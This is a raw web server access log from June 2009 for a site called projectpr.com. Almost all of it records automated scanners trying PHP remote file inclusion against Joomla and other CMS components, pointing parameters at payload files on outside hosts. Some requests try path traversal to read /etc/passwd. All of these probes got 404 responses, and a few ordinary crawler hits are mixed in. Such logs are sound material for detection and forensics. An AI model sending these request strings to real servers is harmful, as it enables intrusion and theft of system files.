203.97.61.43 - - [11/Jun/2009:17:06:20 -0700] "GET /s_loadenv.inc.php?DOCUMENT_ROOT=http://aglifestylesmarketplace.com/AinuLid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
116.121.201.70 - - [11/Jun/2009:17:11:13 -0700] "GET /logs/access_071012.log//administrator/components/com_admin/admin.admin.html.php?mosConfig_absolute_path=http://www.dwno.or.kr/bbs/outlogin_skin/default/id1.txt????? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
116.121.201.70 - - [11/Jun/2009:17:11:27 -0700] "GET /logs/access_071012.log//administrator/components/com_admin/admin.admin.html.php?mosConfig_absolute_path=http://www.dwno.or.kr/bbs/outlogin_skin/default/id1.txt????? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
211.49.99.7 - - [11/Jun/2009:17:19:13 -0700] "GET /include/write.php?dir=http://www.dons-innovations.com/yes.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.projectpr.com"
211.49.99.7 - - [11/Jun/2009:17:19:13 -0700] "GET /logs/access_070912.log%20//include/write.php?dir=http://www.dons-innovations.com/yes.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.projectpr.com"
211.49.99.7 - - [11/Jun/2009:17:19:17 -0700] "GET /logs//include/write.php?dir=http://www.dons-innovations.com/yes.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.projectpr.com"
211.49.99.7 - - [11/Jun/2009:17:21:09 -0700] "GET /include/write.php?dir=http://www.dons-innovations.com/yes.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.projectpr.com"
211.49.99.7 - - [11/Jun/2009:17:21:09 -0700] "GET /logs//include/write.php?dir=http://www.dons-innovations.com/yes.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.projectpr.com"
211.49.99.7 - - [11/Jun/2009:17:21:09 -0700] "GET /logs/access_070912.log%20//include/write.php?dir=http://www.dons-innovations.com/yes.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.projectpr.com"
87.106.134.174 - - [11/Jun/2009:17:27:51 -0700] "GET /include/write.php?dir=ftp://brandon:brandon.no-ip.info/mic22.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
87.106.134.174 - - [11/Jun/2009:17:29:03 -0700] "GET /logs/access_070912.log//include/write.php?dir=ftp://brandon:brandon.no-ip.info/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
87.106.134.174 - - [11/Jun/2009:17:29:03 -0700] "GET /include/write.php?dir=ftp://brandon:brandon.no-ip.info/mic22.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
87.106.134.174 - - [11/Jun/2009:17:29:03 -0700] "GET /logs//include/write.php?dir=ftp://brandon:brandon.no-ip.info/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
87.106.134.174 - - [11/Jun/2009:17:29:55 -0700] "GET /logs/access_071112.log//modules/xfsection/modify.php?dir_module=ftp://brandon:brandon.no-ip.info/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
87.106.134.174 - - [11/Jun/2009:17:29:55 -0700] "GET /modules/xfsection/modify.php?dir_module=ftp://brandon:brandon.no-ip.info/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
87.106.134.174 - - [11/Jun/2009:17:29:56 -0700] "GET /logs//modules/xfsection/modify.php?dir_module=ftp://brandon:brandon.no-ip.info/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
87.106.134.174 - - [11/Jun/2009:17:32:23 -0700] "GET /modules/xfsection/modify.php?dir_module=ftp://brandon:brandon.no-ip.info/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
87.106.134.174 - - [11/Jun/2009:17:34:22 -0700] "GET /logs/access_071012.log//include/write.php?dir=ftp://brandon:brandon.no-ip.info/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
87.106.134.174 - - [11/Jun/2009:17:36:21 -0700] "GET /include/write.php?dir=ftp://brandon:brandon.no-ip.info/mic22.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.805" "projectpr.com"
87.106.134.174 - - [11/Jun/2009:17:37:33 -0700] "GET /logs/access_071212.log//modules/xfsection/modify.php?dir_module=ftp://brandon:brandon.no-ip.info/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
74.6.22.163 - - [11/Jun/2009:17:38:11 -0700] "GET /clipart/?S=A HTTP/1.0" 200 1197 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.projectpr.com"
200.184.70.211 - - [11/Jun/2009:17:38:35 -0700] "GET /logs/access_070812.log//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.yokomagazine.com/mail/bin/copyright.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
200.184.70.211 - - [11/Jun/2009:17:38:35 -0700] "GET /logs//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.yokomagazine.com/mail/bin/copyright.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
200.184.70.211 - - [11/Jun/2009:17:38:35 -0700] "GET /program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.yokomagazine.com/mail/bin/copyright.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
200.184.70.211 - - [11/Jun/2009:17:39:16 -0700] "GET /logs/access_071012.log//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.yokomagazine.com/mail/bin/copyright.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
218.249.36.194 - - [11/Jun/2009:17:42:09 -0700] "GET /program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://kampret.ucoz.com/id_delta/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)" "www.projectpr.com"
218.249.36.194 - - [11/Jun/2009:17:42:09 -0700] "GET /logs//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://kampret.ucoz.com/id_delta/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)" "www.projectpr.com"
190.144.44.36 - - [11/Jun/2009:17:46:27 -0700] "GET /include.php?path[docroot]=http://ibmi.tempsite.ws/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
190.144.44.36 - - [11/Jun/2009:17:46:30 -0700] "GET /logs/access_071012.log//include.php?path[docroot]=http://ibmi.tempsite.ws/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
190.144.44.36 - - [11/Jun/2009:17:46:30 -0700] "GET /logs//include.php?path[docroot]=http://ibmi.tempsite.ws/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
190.144.44.36 - - [11/Jun/2009:17:47:34 -0700] "GET /logs/access_071012.log%20%20//include.php?path[docroot]=http://ibmi.tempsite.ws/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
190.144.44.36 - - [11/Jun/2009:17:49:27 -0700] "GET /logs/access_070912.log%20%20//include.php?path[docroot]=http://ibmi.tempsite.ws/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
89.185.231.103 - - [11/Jun/2009:17:51:43 -0700] "GET /logs/access_071012.log//components/com_simpleboard/file_upload.php?sbp=http://www.mumstudents.org/~rbonthala/log.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
89.185.231.103 - - [11/Jun/2009:17:51:47 -0700] "GET /components/com_simpleboard/file_upload.php?sbp=http://www.mumstudents.org/~rbonthala/log.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
89.185.231.103 - - [11/Jun/2009:17:51:47 -0700] "GET /logs//components/com_simpleboard/file_upload.php?sbp=http://www.mumstudents.org/~rbonthala/log.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
75.102.25.9 - - [11/Jun/2009:17:51:52 -0700] "GET /logs/access_071012.log//components/com_simpleboard/file_upload.php?sbp=http://www.mumstudents.org/~rbonthala/log.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.projectpr.com"
75.102.25.9 - - [11/Jun/2009:17:51:52 -0700] "GET /components/com_simpleboard/file_upload.php?sbp=http://www.mumstudents.org/~rbonthala/log.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.projectpr.com"
75.102.25.9 - - [11/Jun/2009:17:51:53 -0700] "GET /logs//components/com_simpleboard/file_upload.php?sbp=http://www.mumstudents.org/~rbonthala/log.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.projectpr.com"
89.185.231.103 - - [11/Jun/2009:17:52:04 -0700] "GET /logs/access_070612.log//components/com_simpleboard/file_upload.php?sbp=http://www.mumstudents.org/~rbonthala/log.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
75.102.25.9 - - [11/Jun/2009:17:52:06 -0700] "GET /logs/access_070612.log//components/com_simpleboard/file_upload.php?sbp=http://www.mumstudents.org/~rbonthala/log.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.projectpr.com"
217.172.180.136 - - [11/Jun/2009:17:53:15 -0700] "GET /logs/access_070612.log//components/com_simpleboard/file_upload.php?sbp=http://www.mumstudents.org/~rbonthala/log.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.projectpr.com"
217.172.180.136 - - [11/Jun/2009:17:53:16 -0700] "GET /components/com_simpleboard/file_upload.php?sbp=http://www.mumstudents.org/~rbonthala/log.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.projectpr.com"
217.172.180.136 - - [11/Jun/2009:17:53:16 -0700] "GET /logs//components/com_simpleboard/file_upload.php?sbp=http://www.mumstudents.org/~rbonthala/log.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.projectpr.com"
217.172.180.136 - - [11/Jun/2009:17:55:07 -0700] "GET /logs/access_071012.log//components/com_simpleboard/file_upload.php?sbp=http://www.mumstudents.org/~rbonthala/log.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.projectpr.com"
218.234.21.178 - - [11/Jun/2009:18:00:58 -0700] "GET /joomla/index.php?option=com_restaurante&task=http://208.98.22.241/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.projectpr.com"
218.234.21.178 - - [11/Jun/2009:18:00:58 -0700] "GET /logs/access.log/joomla/index.php?option=com_restaurante&task=http://208.98.22.241/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.projectpr.com"
218.234.21.178 - - [11/Jun/2009:18:00:58 -0700] "GET /logs/joomla/index.php?option=com_restaurante&task=http://208.98.22.241/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.projectpr.com"
218.234.21.178 - - [11/Jun/2009:18:01:10 -0700] "GET /logs/access.log/joomla/index.php?option=com_restaurante&task=http://208.98.22.241/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.projectpr.com"
218.234.21.178 - - [11/Jun/2009:18:01:10 -0700] "GET /joomla/index.php?option=com_restaurante&task=http://208.98.22.241/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.projectpr.com"
218.234.21.178 - - [11/Jun/2009:18:01:13 -0700] "GET /logs/joomla/index.php?option=com_restaurante&task=http://208.98.22.241/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.projectpr.com"
212.227.109.148 - - [11/Jun/2009:18:03:12 -0700] "GET /modules/xfsection/modify.php?dir_module=http://www.portalwebfree.xpg.com.br/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
212.227.109.148 - - [11/Jun/2009:18:03:16 -0700] "GET /logs/access_071112.log//modules/xfsection/modify.php?dir_module=http://www.portalwebfree.xpg.com.br/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
212.227.109.148 - - [11/Jun/2009:18:03:16 -0700] "GET /modules/xfsection/modify.php?dir_module=http://www.portalwebfree.xpg.com.br/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
115.133.221.143 - - [11/Jun/2009:18:03:41 -0700] "GET /components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.projectpr.com"
115.133.221.143 - - [11/Jun/2009:18:03:42 -0700] "GET /logs//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.projectpr.com"
115.133.221.143 - - [11/Jun/2009:18:03:42 -0700] "GET /logs/access_070812.log//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.projectpr.com"
151.138.13.244 - - [11/Jun/2009:18:09:14 -0700] "GET / HTTP/1.1" 200 9405 "http://www.dctaylorco.com" "SuperPagesBot/0.2" "projectpr.com"
212.227.109.148 - - [11/Jun/2009:19:05:58 -0700] "GET /logs/access_071212.log//modules/xfsection/modify.php?dir_module=http://www.portalwebfree.xpg.com.br/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
87.106.135.14 - - [11/Jun/2009:19:27:58 -0700] "GET /atom.php5?page=http://www.socawaremme.com//img/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
87.106.135.14 - - [11/Jun/2009:19:27:58 -0700] "GET /logs//atom.php5?page=http://www.socawaremme.com//img/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
87.106.135.14 - - [11/Jun/2009:19:27:58 -0700] "GET /logs/access.log%20%20//atom.php5?page=http://www.socawaremme.com//img/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
78.46.68.17 - - [11/Jun/2009:19:29:18 -0700] "GET /logs//atom.php5?page=http://www.socawaremme.com//img/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
78.46.68.17 - - [11/Jun/2009:19:29:18 -0700] "GET /atom.php5?page=http://www.socawaremme.com//img/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
78.46.68.17 - - [11/Jun/2009:19:29:18 -0700] "GET /logs/access.log%20%20//atom.php5?page=http://www.socawaremme.com//img/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
12.68.140.202 - - [11/Jun/2009:19:47:20 -0700] "GET /logs/access.log//index.php?_SERVER[DOCUMENT_ROOT]=http://208.98.22.241/id.txt??? HTTP/1.0" 404 275 "-" "libwww-perl/5.820" "www.projectpr.com"
12.68.140.202 - - [11/Jun/2009:19:47:20 -0700] "GET /logs//index.php?_SERVER[DOCUMENT_ROOT]=http://208.98.22.241/id.txt??? HTTP/1.0" 404 275 "-" "libwww-perl/5.820" "www.projectpr.com"
12.68.140.202 - - [11/Jun/2009:19:47:20 -0700] "GET /index.php?_SERVER[DOCUMENT_ROOT]=http://208.98.22.241/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.820" "www.projectpr.com"
216.64.169.240 - - [11/Jun/2009:19:51:04 -0700] "GET / HTTP/1.0" 200 9405 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.0.3705; .NET CLR 1.1.4322)" "www.projectpr.com"
222.162.115.67 - - [11/Jun/2009:19:55:05 -0700] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=aki%20el%20host%20de%20tu%20bot?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.projectpr.com"
222.162.115.67 - - [11/Jun/2009:19:55:06 -0700] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=aki%20el%20host%20de%20tu%20bot?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.projectpr.com"
222.162.115.67 - - [11/Jun/2009:19:55:09 -0700] "GET /logs/access_071012.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=aki%20el%20host%20de%20tu%20bot?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.projectpr.com"
190.144.44.36 - - [11/Jun/2009:19:55:35 -0700] "GET /logs/access.log//index.php?_SERVER[DOCUMENT_ROOT]=http://208.98.22.241/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.projectpr.com"
190.144.44.36 - - [11/Jun/2009:19:55:35 -0700] "GET /index.php?_SERVER[DOCUMENT_ROOT]=http://208.98.22.241/id.txt??? HTTP/1.0" 404 275 "-" "libwww-perl/5.79" "www.projectpr.com"
190.144.44.36 - - [11/Jun/2009:19:55:35 -0700] "GET /logs//index.php?_SERVER[DOCUMENT_ROOT]=http://208.98.22.241/id.txt??? HTTP/1.0" 404 275 "-" "libwww-perl/5.79" "www.projectpr.com"
211.49.99.7 - - [11/Jun/2009:19:55:49 -0700] "GET /logs//index.php?_SERVER[DOCUMENT_ROOT]=http://www.dons-innovations.com/yes.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.projectpr.com"
211.49.99.7 - - [11/Jun/2009:19:55:55 -0700] "GET /index.php?_SERVER[DOCUMENT_ROOT]=http://www.dons-innovations.com/yes.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.projectpr.com"
211.49.99.7 - - [11/Jun/2009:19:56:31 -0700] "GET /logs/access.log//index.php?_SERVER[DOCUMENT_ROOT]=http://www.dons-innovations.com/yes.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.projectpr.com"
211.49.99.7 - - [11/Jun/2009:19:56:31 -0700] "GET /logs//index.php?_SERVER[DOCUMENT_ROOT]=http://www.dons-innovations.com/yes.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.projectpr.com"
211.49.99.7 - - [11/Jun/2009:19:56:31 -0700] "GET /index.php?_SERVER[DOCUMENT_ROOT]=http://www.dons-innovations.com/yes.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.projectpr.com"
121.165.73.157 - - [11/Jun/2009:19:58:33 -0700] "GET /logs/errors.php?error=http://www.startenglish.com.br/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
121.165.73.157 - - [11/Jun/2009:19:58:33 -0700] "GET /errors.php?error=http://www.startenglish.com.br/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
121.165.73.157 - - [11/Jun/2009:19:58:36 -0700] "GET /logs/access_070812.log/errors.php?error=http://www.startenglish.com.br/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
208.80.195.51 - - [11/Jun/2009:19:59:01 -0700] "GET / HTTP/1.0" 200 9405 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Maxthon; .NET CLR 2.0.50727; InfoPath.1)" "www.projectpr.com"
121.165.73.157 - - [11/Jun/2009:19:59:27 -0700] "GET /logs/access_071212.log/errors.php?error=http://www.startenglish.com.br/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
121.165.73.157 - - [11/Jun/2009:19:59:42 -0700] "GET /logs/access_070812.log/errors.php?error=http://www.startenglish.com.br/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
121.165.73.157 - - [11/Jun/2009:19:59:45 -0700] "GET /logs/errors.php?error=http://www.startenglish.com.br/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
121.165.73.157 - - [11/Jun/2009:19:59:45 -0700] "GET /errors.php?error=http://www.startenglish.com.br/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
91.198.32.3 - - [11/Jun/2009:19:59:52 -0700] "GET /logs/access_070912.log//?path%5bdocroot%5d=http://www.aptd.ru/files/idtester.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
121.165.73.157 - - [11/Jun/2009:20:00:42 -0700] "GET /logs/access_071212.log/errors.php?error=http://www.startenglish.com.br/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
121.165.73.157 - - [11/Jun/2009:20:01:41 -0700] "GET /errors.php?error=http://www.startenglish.com.br/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
121.165.73.157 - - [11/Jun/2009:20:01:41 -0700] "GET /logs/access_070812.log/errors.php?error=http://www.startenglish.com.br/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
121.165.73.157 - - [11/Jun/2009:20:01:41 -0700] "GET /logs/errors.php?error=http://www.startenglish.com.br/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
121.165.73.157 - - [11/Jun/2009:20:02:24 -0700] "GET /logs/access_071212.log/errors.php?error=http://www.startenglish.com.br/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
91.198.32.3 - - [11/Jun/2009:20:02:33 -0700] "GET /logs/access_071012.log%20//?path%5bdocroot%5d=http://www.aptd.ru/files/idtester.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
121.165.73.157 - - [11/Jun/2009:20:04:49 -0700] "GET /logs/access_070812.log%20%20/errors.php?error=http://www.startenglish.com.br/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
121.165.73.157 - - [11/Jun/2009:20:05:32 -0700] "GET /logs/access_071212.log%20%20/errors.php?error=http://www.startenglish.com.br/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
202.151.177.177 - - [11/Jun/2009:20:08:42 -0700] "GET //administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://aldeanos.com/WEB-INF/lib/.../id3.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
110.45.146.88 - - [11/Jun/2009:20:29:41 -0700] "GET /logs/access_071012.log//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.yorkza.com/fs1/io/it2.jpg??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.projectpr.com"
110.45.146.88 - - [11/Jun/2009:20:29:41 -0700] "GET /components/com_facileforms/facileforms.frame.php?ff_compath=http://www.yorkza.com/fs1/io/it2.jpg??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.projectpr.com"
110.45.144.89 - - [11/Jun/2009:20:29:42 -0700] "GET /logs/access_071012.log//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.yorkza.com/fs1/io/it2.jpg??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.projectpr.com"
110.45.146.88 - - [11/Jun/2009:20:29:42 -0700] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.yorkza.com/fs1/io/it2.jpg??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.projectpr.com"
110.45.144.89 - - [11/Jun/2009:20:29:42 -0700] "GET /components/com_facileforms/facileforms.frame.php?ff_compath=http://www.yorkza.com/fs1/io/it2.jpg??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.projectpr.com"
110.45.144.89 - - [11/Jun/2009:20:29:42 -0700] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.yorkza.com/fs1/io/it2.jpg??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.projectpr.com"
110.45.144.33 - - [11/Jun/2009:20:29:57 -0700] "GET /logs/access_071012.log//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.yorkza.com/fs1/io/it2.jpg??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.projectpr.com"
110.45.144.33 - - [11/Jun/2009:20:30:01 -0700] "GET /components/com_facileforms/facileforms.frame.php?ff_compath=http://www.yorkza.com/fs1/io/it2.jpg??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.projectpr.com"
110.45.144.33 - - [11/Jun/2009:20:30:01 -0700] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.yorkza.com/fs1/io/it2.jpg??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.projectpr.com"
124.217.216.86 - - [11/Jun/2009:20:30:50 -0700] "GET /index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://harvestusa.org///administrator//components/idi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.826" "www.projectpr.com"
124.217.216.86 - - [11/Jun/2009:20:30:50 -0700] "GET /logs/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://harvestusa.org///administrator//components/idi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.826" "www.projectpr.com"
110.45.146.88 - - [11/Jun/2009:20:30:50 -0700] "GET /logs/access_070912.log//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.yorkza.com/fs1/io/it2.jpg??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.projectpr.com"
110.45.144.89 - - [11/Jun/2009:20:30:53 -0700] "GET /logs/access_070912.log//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.yorkza.com/fs1/io/it2.jpg??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.projectpr.com"
124.217.216.86 - - [11/Jun/2009:20:30:53 -0700] "GET /logs/access.log/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://harvestusa.org///administrator//components/idi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.826" "www.projectpr.com"
124.217.216.86 - - [11/Jun/2009:20:31:14 -0700] "GET /index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://harvestusa.org///administrator//components/idi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.826" "www.projectpr.com"
124.217.216.86 - - [11/Jun/2009:20:31:14 -0700] "GET /logs/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://harvestusa.org///administrator//components/idi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.826" "www.projectpr.com"
110.45.144.33 - - [11/Jun/2009:20:31:17 -0700] "GET /logs/access_070912.log//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.yorkza.com/fs1/io/it2.jpg??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.projectpr.com"
124.217.216.86 - - [11/Jun/2009:20:31:17 -0700] "GET /logs/access.log/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://harvestusa.org///administrator//components/idi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.826" "www.projectpr.com"
209.62.42.51 - - [11/Jun/2009:20:35:39 -0700] "GET /logs/access_071112.log/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://fjvdig.iespana.es/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
209.62.42.51 - - [11/Jun/2009:20:35:42 -0700] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://fjvdig.iespana.es/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
209.62.42.51 - - [11/Jun/2009:20:35:42 -0700] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://fjvdig.iespana.es/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
209.62.42.51 - - [11/Jun/2009:20:35:49 -0700] "GET /logs/access_071212.log/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://fjvdig.iespana.es/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
209.62.42.51 - - [11/Jun/2009:20:37:59 -0700] "GET /logs/access_071212.log%20%20/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://fjvdig.iespana.es/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
199.120.90.222 - - [11/Jun/2009:20:59:30 -0700] "GET /logs//components/com_securityimages/lang.php?mosConfig_absolute_path=http://withipod.net/css/responz/rxid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
